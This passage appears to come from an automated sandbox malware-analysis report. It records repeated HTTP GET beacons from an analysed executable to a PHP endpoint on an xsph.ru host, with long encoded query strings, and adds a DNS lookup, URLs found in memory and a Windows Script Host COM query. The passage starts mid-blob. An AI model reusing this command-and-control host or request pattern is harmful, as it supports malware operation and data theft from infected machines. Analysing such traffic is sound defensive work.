TO4QTZ1EmYzQTMmJzNwQGZkVTYjRDOlJWNjJmIsISZxcTYkVWZ2UTYhNTY5UzN5YWY0MjY1M2YmhTYwQmZhJzY3gzNlRWZiojIwY2NkBTYiZTMiJ2YmNTOlljY3QWMiRjYyIGNidTOlRmIsIyY4QWMjNzM3YDO5MWMjNzNyETN4EGZkFzNwAjN1MjY2EGZhdDZyIjZiojI2UGMyMDOjRTY4ETY0EWYllDZ4UzMzkDN2IzYkZGMmBjI7xSfikjVq9UaRhFZ2Z1ViBnUGNGbWdkYUp0QMl2YtJGcChlWshnMVl2bqlkeWhEZoJ1MVVjUYFmMsdEZqZ0aJNXSpNGbkdVW1Z0VUdGMXlVekJjY5JEbJZTS5RmdS1mYwRmRWRkRrl0cJlGVp9maJRnRykVaWJjV6xWbJNXSTdVavpWSsVjMi9mQzIWeOdVYO5EWhl2dplEc0IDZ2VjMhVnVGt0Z0IDZ2VjMhVnVslkNJNlW0ZUbUZlQxEVa3lWSwRjMkZXNyEWdWZ0SnRjMkZXNyEWdWxWS2k0UaRnRtRlVCFjUpdXaJplSp9Ua0cVY0J1VRpHbtl0cJlWS2kUeSJkUsl0cJNEZwpURJBTWElEbOhVY5JkbjxmUuJmRCNUT4FUejNTOHpVdsJjVp9maJlnVtZVdsJjVpd3Uml2ctNmdsFDWzYVbUZXRykFcKhlW0Z0aJZTSTpVd50WZsFzVhBjSDxUaBRUT3FERNdXSp9Ua3dVWw40MidnSDxUaNhlWwY0RkRlQDpFbShVY1ZlRJRXQDpFbs1mWw50VadnTIlEM50GVp9maJ5mSzIWa3lWS0kFRNdHND50MwMET6lEVNNDND1EMJl2Tp1kMiNnSDxUaNZlVp9maJVjSIRWdWNjYqp0QMl2ctNmdsZUSzYVbUl2bqlUd5cVYuZVbjl2dplkcKNjYaJUekxWNrlkNJNVZwwmMZl2dplUMjRVT11kaNhHNp5EM0M0Tp9maJdHbtl0NwpWS2pVbipkQYNVa3lWS6ZVbiZHctlkNJNlW0ZUbUlnVyMmVKNETpVEVOp3ZE5kMJl2TpV1VihWNwEVUKNETplkeNVXVqxEMJl2TplEWadlSYplMKhlWUp0QMlWT5FVavpWSsJEWlVlSYplMKhlWUpUelJiOiIjMxYDM5gDNlVTYiNDNxYmM3ADZkRWNhNGN4UmY1MmYiwiI1EWO0gjN4UWNjVjMjdTO0kTO3EGNlBzYzUWOmljYhBzYzQmNwcjZ2IiOiAjZ3QGMhJmNxImYjZ2M5UWOidDZxIGNiJjY0I2N5UGZiwiIjhDZxM2MzcjN4kzYxM2M3ITM1gTYkRWM3ADM2UzMiZTYkF2NkJjMmJiOiYTZwIzM4MGNhhTMhRTYhVWOkhTNzMTO0YjMjRmZwYGMis3W HTTP/1.1Accept: */*Content-Type: text/cssUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: a0985701.xsph.ru
            Source: global trafficHTTP traffic detected: GET /8724b2c0.php?NojHfreA=XOUz3&s70=tQaeMHcDQCRT7QXgceCiIA&tJD6pNMml=ZU&d7b761e65d6b27ab6613537ab4fbd2d6=gNiJDZ0MTY1UGNkRWYzMzYwIGOiBTN5YTNxgjN1UzMygTZ3kTMiZ2YxIjN3gTNwMTMzYTO0QDN&64f08b8004af955eddd13c6a6e9c8200=gYwY2N1I2NwUTO1kDOkFmZ4YTNhRDM1YTZhRWNxYGM2cTM4YzN5EmM&dd417e5f2f0794e9aefa76f87ad32878=d1nIlFzNhRWZlZTNhF2MhlTN3kjZhRzMiVzYjZGOhBDZmFmMjdDO3UGZlJiOiAjZ3QGMhJmNxImYjZ2M5UWOidDZxIGNiJjY0I2N5UGZiwiIjhDZxM2MzcjN4kzYxM2M3ITM1gTYkRWM3ADM2UzMiZTYkF2NkJjMmJiOiYTZwIzM4MGNhhTMhRTYhVWOkhTNzMTO0YjMjRmZwYGMis3W&a84a2843b4ef9db88df9dc44c2636162=d1nIiojIyITM2ATO4QTZ1EmYzQTMmJzNwQGZkVTYjRDOlJWNjJmIsISZxcTYkVWZ2UTYhNTY5UzN5YWY0MjY1M2YmhTYwQmZhJzY3gzNlRWZiojIwY2NkBTYiZTMiJ2YmNTOlljY3QWMiRjYyIGNidTOlRmIsIyY4QWMjNzM3YDO5MWMjNzNyETN4EGZkFzNwAjN1MjY2EGZhdDZyIjZiojI2UGMyMDOjRTY4ETY0EWYllDZ4UzMzkDN2IzYkZGMmBjI7xSfikjVq9UaRhFZ2Z1ViBnUGNGbWdkYUp0QMl2YtJGcChlWshnMVl2bqlkeWhEZoJ1MVVjUYFmMsdEZqZ0aJNXSpNGbkdVW1Z0VUdGMXlVekJjY5JEbJZTS5RmdS1mYwRmRWRkRrl0cJlGVp9maJRnRykVaWJjV6xWbJNXSTdVavpWSsVjMi9mQzIWeOdVYO5EWhl2dplEc0IDZ2VjMhVnVGt0Z0IDZ2VjMhVnVslkNJNlW0ZUbUZlQxEVa3lWSwRjMkZXNyEWdWZ0SnRjMkZXNyEWdWxWS2k0UaRnRtRlVCFjUpdXaJplSp9Ua0cVY0J1VRpHbtl0cJlWS2kUeSJkUsl0cJNEZwpURJBTWElEbOhVY5JkbjxmUuJmRCNUT4FUejNTOHpVdsJjVp9maJlnVtZVdsJjVpd3Uml2ctNmdsFDWzYVbUZXRykFcKhlW0Z0aJZTSTpVd50WZsFzVhBjSDxUaBRUT3FERNdXSp9Ua3dVWw40MidnSDxUaNhlWwY0RkRlQDpFbShVY1ZlRJRXQDpFbs1mWw50VadnTIlEM50GVp9maJ5mSzIWa3lWS0kFRNdHND50MwMET6lEVNNDND1EMJl2Tp1kMiNnSDxUaNZlVp9maJVjSIRWdWNjYqp0QMl2ctNmdsZUSzYVbUl2bqlUd5cVYuZVbjl2dplkcKNjYaJUekxWNrlkNJNVZwwmMZl2dplUMjRVT11kaNhHNp5EM0M0Tp9maJdHbtl0NwpWS2pVbipkQYNVa3lWS6ZVbiZHctlkNJNlW0ZUbUlnVyMmVKNETpVEVOp3ZE5kMJl2TpV1VihWNwEVUKNETplkeNVXVqxEMJl2TplEWadlSYplMKhlWUp0QMlWT5FVavpWSsJEWlVlSYplMKhlWUpUelJiOiIjMxYDM5gDNlVTYiNDNxYmM3ADZkRWNhNGN4UmY1MmYiwiI1EWO0gjN4UWNjVjMjdTO0kTO3EGNlBzYzUWOmljYhBzYzQmNwcjZ2IiOiAjZ3QGMhJmNxImYjZ2M5UWOidDZxIGNiJjY0I2N5UGZiwiIjhDZxM2MzcjN4kzYxM2M3ITM1gTYkRWM3ADM2UzMiZTYkF2NkJjMmJiOiYTZwIzM4MGNhhTMhRTYhVWOkhTNzMTO0YjMjRmZwYGMis3W HTTP/1.1Accept: */*Content-Type: text/cssUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: a0985701.xsph.ru
            Source: global trafficHTTP traffic detected: GET /8724b2c0.php?NojHfreA=XOUz3&s70=tQaeMHcDQCRT7QXgceCiIA&tJD6pNMml=ZU&d7b761e65d6b27ab6613537ab4fbd2d6=gNiJDZ0MTY1UGNkRWYzMzYwIGOiBTN5YTNxgjN1UzMygTZ3kTMiZ2YxIjN3gTNwMTMzYTO0QDN&64f08b8004af955eddd13c6a6e9c8200=gYwY2N1I2NwUTO1kDOkFmZ4YTNhRDM1YTZhRWNxYGM2cTM4YzN5EmM&dd417e5f2f0794e9aefa76f87ad32878=d1nIlFzNhRWZlZTNhF2MhlTN3kjZhRzMiVzYjZGOhBDZmFmMjdDO3UGZlJiOiAjZ3QGMhJmNxImYjZ2M5UWOidDZxIGNiJjY0I2N5UGZiwiIjhDZxM2MzcjN4kzYxM2M3ITM1gTYkRWM3ADM2UzMiZTYkF2NkJjMmJiOiYTZwIzM4MGNhhTMhRTYhVWOkhTNzMTO0YjMjRmZwYGMis3W&a84a2843b4ef9db88df9dc44c2636162=d1nIiojIyITM2ATO4QTZ1EmYzQTMmJzNwQGZkVTYjRDOlJWNjJmIsISZxcTYkVWZ2UTYhNTY5UzN5YWY0MjY1M2YmhTYwQmZhJzY3gzNlRWZiojIwY2NkBTYiZTMiJ2YmNTOlljY3QWMiRjYyIGNidTOlRmIsIyY4QWMjNzM3YDO5MWMjNzNyETN4EGZkFzNwAjN1MjY2EGZhdDZyIjZiojI2UGMyMDOjRTY4ETY0EWYllDZ4UzMzkDN2IzYkZGMmBjI7xSfikjVq9UaRhFZ2Z1ViBnUGNGbWdkYUp0QMl2YtJGcChlWshnMVl2bqlkeWhEZoJ1MVVjUYFmMsdEZqZ0aJNXSpNGbkdVW1Z0VUdGMXlVekJjY5JEbJZTS5RmdS1mYwRmRWRkRrl0cJlGVp9maJRnRykVaWJjV6xWbJNXSTdVavpWSsVjMi9mQzIWeOdVYO5EWhl2dplEc0IDZ2VjMhVnVGt0Z0IDZ2VjMhVnVslkNJNlW0ZUbUZlQxEVa3lWSwRjMkZXNyEWdWZ0SnRjMkZXNyEWdWxWS2k0UaRnRtRlVCFjUpdXaJplSp9Ua0cVY0J1VRpHbtl0cJlWS2kUeSJkUsl0cJNEZwpURJBTWElEbOhVY5JkbjxmUuJmRCNUT4FUejNTOHpVdsJjVp9maJlnVtZVdsJjVpd3Uml2ctNmdsFDWzYVbUZXRykFcKhlW0Z0aJZTSTpVd50WZsFzVhBjSDxUaBRUT3FERNdXSp9Ua3dVWw40MidnSDxUaNhlWwY0RkRlQDpFbShVY1ZlRJRXQDpFbs1mWw50VadnTIlEM50GVp9maJ5mSzIWa3lWS0kFRNdHND50MwMET6lEVNNDND1EMJl2Tp1kMiNnSDxUaNZlVp9maJVjSIRWdWNjYqp0QMl2ctNmdsZUSzYVbUl2bqlUd5cVYuZVbjl2dplkcKNjYaJUekxWNrlkNJNVZwwmMZl2dplUMjRVT11kaNhHNp5EM0M0Tp9maJdHbtl0NwpWS2pVbipkQYNVa3lWS6ZVbiZHctlkNJNlW0ZUbUlnVyMmVKNETpVEVOp3ZE5kMJl2TpV1VihWNwEVUKNETplkeNVXVqxEMJl2TplEWadlSYplMKhlWUp0QMlWT5FVavpWSsJEWlVlSYplMKhlWUpUelJiOiIjMxYDM5gDNlVTYiNDNxYmM3ADZkRWNhNGN4UmY1MmYiwiI1EWO0gjN4UWNjVjMjdTO0kTO3EGNlBzYzUWOmljYhBzYzQmNwcjZ2IiOiAjZ3QGMhJmNxImYjZ2M5UWOidDZxIGNiJjY0I2N5UGZiwiIjhDZxM2MzcjN4kzYxM2M3ITM1gTYkRWM3ADM2UzMiZTYkF2NkJjMmJiOiYTZwIzM4MGNhhTMhRTYhVWOkhTNzMTO0YjMjRmZwYGMis3W HTTP/1.1Accept: */*Content-Type: text/cssUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: a0985701.xsph.ru
            Source: global trafficHTTP traffic detected: GET /8724b2c0.php?NojHfreA=XOUz3&s70=tQaeMHcDQCRT7QXgceCiIA&tJD6pNMml=ZU&d7b761e65d6b27ab6613537ab4fbd2d6=gNiJDZ0MTY1UGNkRWYzMzYwIGOiBTN5YTNxgjN1UzMygTZ3kTMiZ2YxIjN3gTNwMTMzYTO0QDN&64f08b8004af955eddd13c6a6e9c8200=gYwY2N1I2NwUTO1kDOkFmZ4YTNhRDM1YTZhRWNxYGM2cTM4YzN5EmM&dd417e5f2f0794e9aefa76f87ad32878=d1nIlFzNhRWZlZTNhF2MhlTN3kjZhRzMiVzYjZGOhBDZmFmMjdDO3UGZlJiOiAjZ3QGMhJmNxImYjZ2M5UWOidDZxIGNiJjY0I2N5UGZiwiIjhDZxM2MzcjN4kzYxM2M3ITM1gTYkRWM3ADM2UzMiZTYkF2NkJjMmJiOiYTZwIzM4MGNhhTMhRTYhVWOkhTNzMTO0YjMjRmZwYGMis3W&a84a2843b4ef9db88df9dc44c2636162=QX9JiI6IiMyEjNwkDO0UWNhJ2M0EjZycDMkRGZ1E2Y0gTZiVzYiJCLiUWM3EGZlVmN1EWYzEWO1cTOmFGNzIWNjNmZ4EGMkZWYyM2N4cTZkVmI6ICMmdDZwEmY2EjYiNmZzkTZ5I2NkFjY0ImMiRjY3kTZkJCLiMGOkFzYzMzN2gTOjFzYzcjMxUDOhRGZxcDMwYTNzImNhRWY3QmMyYmI6IiNlBjMzgzY0EGOxEGNhFWZ5QGO1MzM5QjNyMGZmBjZwIyes0nI5YlaPlWUYRmdWdlYwJlRjxmVHJGVKNETpNWbiBnQYpFb4JTVp9maJpnVIRGaSNTV1IFWhJDbHRmaGtWSzlUaJZTS5RmdS1mYwRmRWRkRrl0cJlGVp9maJRnRykVaWJjV6xWbJNXSTdVavpWSsVjMi9mQzIWeOdVYO5EWhl2dplEc0IDZ2VjMhVnVGt0Z0IDZ2VjMhVnVslkNJNlW0ZUbUZlQxEVa3lWSwRjMkZXNyEWdWZ0SnRjMkZXNyEWdWxWS2k0UaRnRtRlVCFjUpdXaJplSp9Ua0cVY0J1VRpHbtl0cJlWS2kUeSJkUsl0cJNEZwpURJBTWElEbOhVY5JkbjxmUuJmRCNUT4FUejNTOHpVdsJjVp9maJlnVtZVdsJjVpd3Uml2ctNmdsFDWzYVbUZXRykFcKhlW0Z0aJZTSTpVd50WZsFzVhBjSDxUaBRUT3FERNdXSp9Ua3dVWw40MidnSDxUaNhlWwY0RkRlQDpFbShVY1ZlRJRXQDpFbs1mWw50VadnTIlEM50GVp9maJ5mSzIWa3lWS0kFRNdHND50MwMET6lEVNNDND1EMJl2Tp1kMiNnSDxUaNZlVp9maJVjSIRWdWNjYqp0QMl2ctNmdsZUSzYVbUl2bqlUd5cVYuZVbjl2dplkcKNjYaJUekxWNrlkNJNVZwwmMZl2dplUMjRVT11kaNhHNp5EM0M0Tp9maJdHbtl0NwpWS2pVbipkQYNVa3lWS6ZVbiZHctlkNJNlW0ZUbUlnVyMmVKNETpVEVOp3ZE5kMJl2TpV1VihWNwEVUKNETplkeNVXVqxEMJl2TplEWadlSYplMKhlWUp0QMlWT5FVavpWSsJEWlVlSYplMKhlWUpUelJiOiIjMxYDM5gDNlVTYiNDNxYmM3ADZkRWNhNGN4UmY1MmYiwiI1EWO0gjN4UWNjVjMjdTO0kTO3EGNlBzYzUWOmljYhBzYzQmNwcjZ2IiOiAjZ3QGMhJmNxImYjZ2M5UWOidDZxIGNiJjY0I2N5UGZiwiIjhDZxM2MzcjN4kzYxM2M3ITM1gTYkRWM3ADM2UzMiZTYkF2NkJjMmJiOiYTZwIzM4MGNhhTMhRTYhVWOkhTNzMTO0YjMjRmZwYGMis3W HTTP/1.1Accept: */*Content-Type: text/cssUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: a0985701.xsph.ruConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /8724b2c0.php?NojHfreA=XOUz3&s70=tQaeMHcDQCRT7QXgceCiIA&tJD6pNMml=ZU&d7b761e65d6b27ab6613537ab4fbd2d6=gNiJDZ0MTY1UGNkRWYzMzYwIGOiBTN5YTNxgjN1UzMygTZ3kTMiZ2YxIjN3gTNwMTMzYTO0QDN&64f08b8004af955eddd13c6a6e9c8200=gYwY2N1I2NwUTO1kDOkFmZ4YTNhRDM1YTZhRWNxYGM2cTM4YzN5EmM&dd417e5f2f0794e9aefa76f87ad32878=d1nIlFzNhRWZlZTNhF2MhlTN3kjZhRzMiVzYjZGOhBDZmFmMjdDO3UGZlJiOiAjZ3QGMhJmNxImYjZ2M5UWOidDZxIGNiJjY0I2N5UGZiwiIjhDZxM2MzcjN4kzYxM2M3ITM1gTYkRWM3ADM2UzMiZTYkF2NkJjMmJiOiYTZwIzM4MGNhhTMhRTYhVWOkhTNzMTO0YjMjRmZwYGMis3W&a84a2843b4ef9db88df9dc44c2636162=d1nIiojIyITM2ATO4QTZ1EmYzQTMmJzNwQGZkVTYjRDOlJWNjJmIsISZxcTYkVWZ2UTYhNTY5UzN5YWY0MjY1M2YmhTYwQmZhJzY3gzNlRWZiojIwY2NkBTYiZTMiJ2YmNTOlljY3QWMiRjYyIGNidTOlRmIsIyY4QWMjNzM3YDO5MWMjNzNyETN4EGZkFzNwAjN1MjY2EGZhdDZyIjZiojI2UGMyMDOjRTY4ETY0EWYllDZ4UzMzkDN2IzYkZGMmBjI7xSfikjVq9UaRhFZ2Z1ViBnUGNGbWdkYUp0QMl2YtJGcChlWshnMVl2bqlkeWhEZoJ1MVVjUYFmMsdEZqZ0aJNXSpNGbkdVW1Z0VUdGMXlVekJjY5JEbJZTS5RmdS1mYwRmRWRkRrl0cJlGVp9maJRnRykVaWJjV6xWbJNXSTdVavpWSsVjMi9mQzIWeOdVYO5EWhl2dplEc0IDZ2VjMhVnVGt0Z0IDZ2VjMhVnVslkNJNlW0ZUbUZlQxEVa3lWSwRjMkZXNyEWdWZ0SnRjMkZXNyEWdWxWS2k0UaRnRtRlVCFjUpdXaJplSp9Ua0cVY0J1VRpHbtl0cJlWS2kUeSJkUsl0cJNEZwpURJBTWElEbOhVY5JkbjxmUuJmRCNUT4FUejNTOHpVdsJjVp9maJlnVtZVdsJjVpd3Uml2ctNmdsFDWzYVbUZXRykFcKhlW0Z0aJZTSTpVd50WZsFzVhBjSDxUaBRUT3FERNdXSp9Ua3dVWw40MidnSDxUaNhlWwY0RkRlQDpFbShVY1ZlRJRXQDpFbs1mWw50VadnTIlEM50GVp9maJ5mSzIWa3lWS0kFRNdHND50MwMET6lEVNNDND1EMJl2Tp1kMiNnSDxUaNZlVp9maJVjSIRWdWNjYqp0QMl2ctNmdsZUSzYVbUl2bqlUd5cVYuZVbjl2dplkcKNjYaJUekxWNrlkNJNVZwwmMZl2dplUMjRVT11kaNhHNp5EM0M0Tp9maJdHbtl0NwpWS2pVbipkQYNVa3lWS6ZVbiZHctlkNJNlW0ZUbUlnVyMmVKNETpVEVOp3ZE5kMJl2TpV1VihWNwEVUKNETplkeNVXVqxEMJl2TplEWadlSYplMKhlWUp0QMlWT5FVavpWSsJEWlVlSYplMKhlWUpUelJiOiIjMxYDM5gDNlVTYiNDNxYmM3ADZkRWNhNGN4UmY1MmYiwiI1EWO0gjN4UWNjVjMjdTO0kTO3EGNlBzYzUWOmljYhBzYzQmNwcjZ2IiOiAjZ3QGMhJmNxImYjZ2M5UWOidDZxIGNiJjY0I2N5UGZiwiIjhDZxM2MzcjN4kzYxM2M3ITM1gTYkRWM3ADM2UzMiZTYkF2NkJjMmJiOiYTZwIzM4MGNhhTMhRTYhVWOkhTNzMTO0YjMjRmZwYGMis3W HTTP/1.1Accept: */*Content-Type: text/cssUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: a0985701.xsph.ruConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /8724b2c0.php?NojHfreA=XOUz3&s70=tQaeMHcDQCRT7QXgceCiIA&tJD6pNMml=ZU&d7b761e65d6b27ab6613537ab4fbd2d6=gNiJDZ0MTY1UGNkRWYzMzYwIGOiBTN5YTNxgjN1UzMygTZ3kTMiZ2YxIjN3gTNwMTMzYTO0QDN&64f08b8004af955eddd13c6a6e9c8200=gYwY2N1I2NwUTO1kDOkFmZ4YTNhRDM1YTZhRWNxYGM2cTM4YzN5EmM&dd417e5f2f0794e9aefa76f87ad32878=d1nIlFzNhRWZlZTNhF2MhlTN3kjZhRzMiVzYjZGOhBDZmFmMjdDO3UGZlJiOiAjZ3QGMhJmNxImYjZ2M5UWOidDZxIGNiJjY0I2N5UGZiwiIjhDZxM2MzcjN4kzYxM2M3ITM1gTYkRWM3ADM2UzMiZTYkF2NkJjMmJiOiYTZwIzM4MGNhhTMhRTYhVWOkhTNzMTO0YjMjRmZwYGMis3W&a84a2843b4ef9db88df9dc44c2636162=d1nIiojIyITM2ATO4QTZ1EmYzQTMmJzNwQGZkVTYjRDOlJWNjJmIsISZxcTYkVWZ2UTYhNTY5UzN5YWY0MjY1M2YmhTYwQmZhJzY3gzNlRWZiojIwY2NkBTYiZTMiJ2YmNTOlljY3QWMiRjYyIGNidTOlRmIsIyY4QWMjNzM3YDO5MWMjNzNyETN4EGZkFzNwAjN1MjY2EGZhdDZyIjZiojI2UGMyMDOjRTY4ETY0EWYllDZ4UzMzkDN2IzYkZGMmBjI7xSfikjVq9UaRhFZ2Z1ViBnUGNGbWdkYUp0QMl2YtJGcChlWshnMVl2bqlkeWhEZoJ1MVVjUYFmMsdEZqZ0aJNXSpNGbkdVW1Z0VUdGMXlVekJjY5JEbJZTS5RmdS1mYwRmRWRkRrl0cJlGVp9maJRnRykVaWJjV6xWbJNXSTdVavpWSsVjMi9mQzIWeOdVYO5EWhl2dplEc0IDZ2VjMhVnVGt0Z0IDZ2VjMhVnVslkNJNlW0ZUbUZlQxEVa3lWSwRjMkZXNyEWdWZ0SnRjMkZXNyEWdWxWS2k0UaRnRtRlVCFjUpdXaJplSp9Ua0cVY0J1VRpHbtl0cJlWS2kUeSJkUsl0cJNEZwpURJBTWElEbOhVY5JkbjxmUuJmRCNUT4FUejNTOHpVdsJjVp9maJlnVtZVdsJjVpd3Uml2ctNmdsFDWzYVbUZXRykFcKhlW0Z0aJZTSTpVd50WZsFzVhBjSDxUaBRUT3FERNdXSp9Ua3dVWw40MidnSDxUaNhlWwY0RkRlQDpFbShVY1ZlRJRXQDpFbs1mWw50VadnTIlEM50GVp9maJ5mSzIWa3lWS0kFRNdHND50MwMET6lEVNNDND1EMJl2Tp1kMiNnSDxUaNZlVp9maJVjSIRWdWNjYqp0QMl2ctNmdsZUSzYVbUl2bqlUd5cVYuZVbjl2dplkcKNjYaJUekxWNrlkNJNVZwwmMZl2dplUMjRVT11kaNhHNp5EM0M0Tp9maJdHbtl0NwpWS2pVbipkQYNVa3lWS6ZVbiZHctlkNJNlW0ZUbUlnVyMmVKNETpVEVOp3ZE5kMJl2TpV1VihWNwEVUKNETplkeNVXVqxEMJl2TplEWadlSYplMKhlWUp0QMlWT5FVavpWSsJEWlVlSYplMKhlWUpUelJiOiIjMxYDM5gDNlVTYiNDNxYmM3ADZkRWNhNGN4UmY1MmYiwiI1EWO0gjN4UWNjVjMjdTO0kTO3EGNlBzYzUWOmljYhBzYzQmNwcjZ2IiOiAjZ3QGMhJmNxImYjZ2M5UWOidDZxIGNiJjY0I2N5UGZiwiIjhDZxM2MzcjN4kzYxM2M3ITM1gTYkRWM3ADM2UzMiZTYkF2NkJjMmJiOiYTZwIzM4MGNhhTMhRTYhVWOkhTNzMTO0YjMjRmZwYGMis3W HTTP/1.1Accept: */*Content-Type: text/cssUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: a0985701.xsph.ru
            Source: global trafficHTTP traffic detected: GET /8724b2c0.php?NojHfreA=XOUz3&s70=tQaeMHcDQCRT7QXgceCiIA&tJD6pNMml=ZU&d7b761e65d6b27ab6613537ab4fbd2d6=gNiJDZ0MTY1UGNkRWYzMzYwIGOiBTN5YTNxgjN1UzMygTZ3kTMiZ2YxIjN3gTNwMTMzYTO0QDN&64f08b8004af955eddd13c6a6e9c8200=gYwY2N1I2NwUTO1kDOkFmZ4YTNhRDM1YTZhRWNxYGM2cTM4YzN5EmM&dd417e5f2f0794e9aefa76f87ad32878=d1nIlFzNhRWZlZTNhF2MhlTN3kjZhRzMiVzYjZGOhBDZmFmMjdDO3UGZlJiOiAjZ3QGMhJmNxImYjZ2M5UWOidDZxIGNiJjY0I2N5UGZiwiIjhDZxM2MzcjN4kzYxM2M3ITM1gTYkRWM3ADM2UzMiZTYkF2NkJjMmJiOiYTZwIzM4MGNhhTMhRTYhVWOkhTNzMTO0YjMjRmZwYGMis3W&a84a2843b4ef9db88df9dc44c2636162=d1nIiojIyITM2ATO4QTZ1EmYzQTMmJzNwQGZkVTYjRDOlJWNjJmIsISZxcTYkVWZ2UTYhNTY5UzN5YWY0MjY1M2YmhTYwQmZhJzY3gzNlRWZiojIwY2NkBTYiZTMiJ2YmNTOlljY3QWMiRjYyIGNidTOlRmIsIyY4QWMjNzM3YDO5MWMjNzNyETN4EGZkFzNwAjN1MjY2EGZhdDZyIjZiojI2UGMyMDOjRTY4ETY0EWYllDZ4UzMzkDN2IzYkZGMmBjI7xSfikjVq9UaRhFZ2Z1ViBnUGNGbWdkYUp0QMl2YtJGcChlWshnMVl2bqlkeWhEZoJ1MVVjUYFmMsdEZqZ0aJNXSpNGbkdVW1Z0VUdGMXlVekJjY5JEbJZTS5RmdS1mYwRmRWRkRrl0cJlGVp9maJRnRykVaWJjV6xWbJNXSTdVavpWSsVjMi9mQzIWeOdVYO5EWhl2dplEc0IDZ2VjMhVnVGt0Z0IDZ2VjMhVnVslkNJNlW0ZUbUZlQxEVa3lWSwRjMkZXNyEWdWZ0SnRjMkZXNyEWdWxWS2k0UaRnRtRlVCFjUpdXaJplSp9Ua0cVY0J1VRpHbtl0cJlWS2kUeSJkUsl0cJNEZwpURJBTWElEbOhVY5JkbjxmUuJmRCNUT4FUejNTOHpVdsJjVp9maJlnVtZVdsJjVpd3Uml2ctNmdsFDWzYVbUZXRykFcKhlW0Z0aJZTSTpVd50WZsFzVhBjSDxUaBRUT3FERNdXSp9Ua3dVWw40MidnSDxUaNhlWwY0RkRlQDpFbShVY1ZlRJRXQDpFbs1mWw50VadnTIlEM50GVp9maJ5mSzIWa3lWS0kFRNdHND50MwMET6lEVNNDND1EMJl2Tp1kMiNnSDxUaNZlVp9maJVjSIRWdWNjYqp0QMl2ctNmdsZUSzYVbUl2bqlUd5cVYuZVbjl2dplkcKNjYaJUekxWNrlkNJNVZwwmMZl2dplUMjRVT11kaNhHNp5EM0M0Tp9maJdHbtl0NwpWS2pVbipkQYNVa3lWS6ZVbiZHctlkNJNlW0ZUbUlnVyMmVKNETpVEVOp3ZE5kMJl2TpV1VihWNwEVUKNETplkeNVXVqxEMJl2TplEWadlSYplMKhlWUp0QMlWT5FVavpWSsJEWlVlSYplMKhlWUpUelJiOiIjMxYDM5gDNlVTYiNDNxYmM3ADZkRWNhNGN4UmY1MmYiwiI1EWO0gjN4UWNjVjMjdTO0kTO3EGNlBzYzUWOmljYhBzYzQmNwcjZ2IiOiAjZ3QGMhJmNxImYjZ2M5UWOidDZxIGNiJjY0I2N5UGZiwiIjhDZxM2MzcjN4kzYxM2M3ITM1gTYkRWM3ADM2UzMiZTYkF2NkJjMmJiOiYTZwIzM4MGNhhTMhRTYhVWOkhTNzMTO0YjMjRmZwYGMis3W HTTP/1.1Accept: */*Content-Type: text/cssUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: a0985701.xsph.ruConnection: Keep-Alive
            Source: global trafficDNS traffic detected: DNS query: a0985701.xsph.ru
            Source: qVUjshNEHYUOCXyHyUMQwFlZoe.exe, 0000001C.00000002.2883759214.0000000002F00000.00000004.00000800.00020000.00000000.sdmp, qVUjshNEHYUOCXyHyUMQwFlZoe.exe, 0000001C.00000002.2883759214.0000000002951000.00000004.00000800.00020000.00000000.sdmp, qVUjshNEHYUOCXyHyUMQwFlZoe.exe, 0000001C.00000002.2883759214.0000000002B5D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://a0985701.xsph.ru
            Source: qVUjshNEHYUOCXyHyUMQwFlZoe.exe, 0000001C.00000002.2883759214.0000000002951000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://a0985701.xsph.ru/
            Source: qVUjshNEHYUOCXyHyUMQwFlZoe.exe, 0000001C.00000002.2883759214.0000000002951000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://a0985701.xsph.ru/8724b2c0.php?JXADoN71DREbXlN5ShtBqUILw=EapRi6atSHCfexR2Fv1OzkYpt1k&FyPyQyIgL
            Source: qVUjshNEHYUOCXyHyUMQwFlZoe.exe, 0000001C.00000002.2883759214.0000000002AE0000.00000004.00000800.00020000.00000000.sdmp, qVUjshNEHYUOCXyHyUMQwFlZoe.exe, 0000001C.00000002.2883759214.0000000002A00000.00000004.00000800.00020000.00000000.sdmp, qVUjshNEHYUOCXyHyUMQwFlZoe.exe, 0000001C.00000002.2883759214.0000000002ABC000.00000004.00000800.00020000.00000000.sdmp, qVUjshNEHYUOCXyHyUMQwFlZoe.exe, 0000001C.00000002.2883759214.0000000002EEB000.00000004.00000800.00020000.00000000.sdmp, qVUjshNEHYUOCXyHyUMQwFlZoe.exe, 0000001C.00000002.2883759214.0000000002F00000.00000004.00000800.00020000.00000000.sdmp, qVUjshNEHYUOCXyHyUMQwFlZoe.exe, 0000001C.00000002.2883759214.0000000002B5D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://a0985701.xsph.ru/8724b2c0.php?NojHfreA=XOUz3&s70=tQaeMHcDQCRT7QXgceCiIA&tJD6pNMml=ZU&d7b761e6
            Source: blockServerruntime.exe, 00000004.00000002.1737024457.000000000287F000.00000004.00000800.00020000.00000000.sdmp, qVUjshNEHYUOCXyHyUMQwFlZoe.exe, 0000001C.00000002.2883759214.0000000002951000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name

            System Summary

            barindex
            Source: C:\Windows\SysWOW64\wscript.exeCOM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}Jump to behavior
